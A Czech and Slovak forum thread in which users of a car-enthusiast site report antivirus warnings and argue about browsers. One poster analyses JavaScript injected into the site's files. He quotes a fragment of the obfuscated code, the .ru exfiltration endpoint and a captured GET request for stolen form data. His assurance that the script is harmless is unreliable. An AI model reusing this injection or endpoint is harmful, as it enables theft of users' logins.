z Webu zmizel na chatu se objevil 😀
Dnes jsem komunikoval s Džonem, vir zlikvidoval. Důkazem jest, že mě se z domu nechtělo AVG vůbec pustit a dnes to jde.
Falcon: no... to by asi dost uživatelnů zmátlo, kdyby se jim místo plochy a ikonek zobrazil commander 😀
Daves: No, protože Internet Explorer je propojenej a těsně provázanej s Windows Explorerem, musely by se Wokna nastavit tak, aby se místo explorer.exe spouštěl třeba Windows Commander 😀
Taky jsem se rozhoupal a přeinstaloval compa. Ale měl jsem tu bordel už od jara, tohle byla jen poslední kapka.
na chatu me to spusti paniku i mi...na strankach je uz vse ok...
Hlásí to i mě.
Hlasi to trojana na chat-e len mne?
Exploreru se stejně neubráníš, leda bys odinstaloval windows 😉
Potvrzuju, že není potřeba mít zapnutý prohlížeč. Těsně před tím, než začal antivir řvát a přesouvat, mi lehce zachrochtal disk a blikla ikonka spuštěné Javy. (Hlídám ho, i když se koukám na TV 🙂 Na kompu běžel akorát QIP.


Ále co, stejně to už bylo zanesený, reinstalace to zrychlila a při té příležitosti jsem promazal nepotřebné krámy 🙂


A navzdory tomu, že jsem byl 100% uživatel IE, přešel jsem 100% na Chrome (protože mám rád pochromované věci). Ani ikonku IE jsem si na ploše nenechal 😀
Džonovi
Sice nevím komu poděkovat, ale děkuju za opravu.
Došlo k opravě. Doufejme že se stav nevrátí.
Petr: asi už si zvyknul 😀








Kaspersky na Firefoxu bez reakce.
Je to mylný dojem, nebo skutečně došlo k opravě ? Norton již dnes odpoledne nic nehlásí.
Ať si každej použivá co chce, krom IE....
LL: A pro Tebe snad není wyleštěný eR wýfuk s hromadou chromu okolo pornografický a orgastický?





🙂
m8: ať si každý používá co chce. Sám jako uživatel chromu sis musel všimnout, že ne všechno v něm funguje. Takže osobně používám IE, protože je všude a umí všechno (zvládne zobrazit sebevětší prasárnu), Operu protože je nejrychlejší, Chrom protože je nadějný a Firefox, přestože je nejpomalejší, kvůli udržení kompatibility s těmi, co jej používají.





A na níže uvedeném problému exploitu bylo vidět, že na prohlížeči nezáleží.





Je to stejné, jako kdybys o 110R prohlásil, že je dobrá akorát k tomu naučit se v ní jezdit a pak ji šrotnout. 😉





Pokud bychom zabředli do debaty který prohlížeč je nejlepší, pak třeba Matrox si vede velmi dobře (lépe než třeba firefox). Doporučuji pak různé odborné články, nejlépe několik a udělat si z nich střízlivý závěr.
Ještě přidám:





,,IE je dobrej akorát ke stažení jinýho prohlížeče,, 🙂))
Používání IE je jen pro otrlé, vždyť i sám Bill radí přejít ke konkurenci 🙂)).
Pokud jste něco chytli, nepochází to odsud. Jak už jsem psal, zkoumal jsem zdrojový kód toho vira a je to pro počítač neškodný exploit. Pouze neotvírejte v dalších záložkách jiné stránky. Třeba google mail, facebook, yahoo atp. Prostě prohlížeč zavřete a otevřete nový.





Mluvíme-li o virech obecně, k tomu abyste byli nakaženi nepotřebujete ani otevřít prohlížeč. Stačí pouze mít zapnutý počítač připojený k internetu.
Jo jo, vir Rootkit-gen si vybral i u mne daň. Bohužel mne připravil o iluzi, že tyhle sračky se chytaj jen ve světě porna na netu 😕





Jen by mě ještě zajímalo, jaký prohlížeč používají Ti, kdo byli nakaženi? Jestli to neni tak, že potíže měl hlavně IE.
Nevím jestli to bylo odtud, ale NĚCO mi ustřelilo a sestřelilo komp v pátek v noci a ráno mi volal Láďa Ladič, že má taky problém.


Nebyl by ani takovej problém s infekcí jako ten, že dementní antivir si pro jistotu schoval nakažené SYSTÉMOVÉ soubory do truhly 🙁
Smazat škodlivej kod, změnit heslo a to může jen BigBoss
Řešení ?
Jsou napadené JS soubory na serveru:





multifile.js


default.js





Na konci těch souborů je připojený virus.





this.j="";var tB=new Date();function W(){this.H=\'\';this.fI=\'.......





Zběžně jsem koukal co dělá, nemusíte se bát, že by se vám šířil po počítači, ničil soubory a podobně. V tom je neškodný. Ale založí na webu INFRAME který monitoruje určitá pole (Google, Facebook... ... ...) na jiných záložkách ve stejném prohlížeči. Výsledek pak odesílí na adresu:





nypost-com.megavideo.com.tiscali-it.redseaportal.ru:8080/index.php?jl=





GET /index.php?jl= HTTP/1.1


Accept: application/x-ms-application, image/jpeg, Referer: http://www.skoda110r.cz/


Accept-Language: cs-CZ


Accept-Encoding: gzip, deflate


Host: nypost-com.megavideo.com.tiscali-it.redseaportal.ru:8080


Connection: Keep-Alive
NOD32, vcera hlasil tiez tr.kona, dnes OK.(alebo si zvykol?) 🙂
Mě řve AVG, tuto hlášku.
no ja mam aj avast aj avg (na 2 pc) a nikto nic zatial ...
AVG a Avast .... AVG - brzda všeho a Avast je sám o sobě vir 🙂) V určité situaci je schopen zahlásit sám sebe 🙂





Norton od Symantec nic přímo neukazuje a při pohledu do historie zabezpečení je zapsána hláška o blokování nějakého přístupu odněkud při každém připojení na web. V každém případě tu někde něco je.
Mi co máme desítkovího F-Secura jsme v pohodě🙂
Mě řve AVG
Potvrdzujem, mne avast tiez hlasil trojskeho kona...aj vcera vecer aj dnes rano...
Mně nemá pro jistotu ani co hlesnout😋
mě Avast ani nehlesne...
Jj, sem si večer myslel, že je to nějaká haluz, ale teď mi Avast řve jak kráva...zapotřebí nasadit léčbu!
Nazdárek pánové, máme tady asi chřipku ....po načtení stránek mi NOD32 hlási trojana...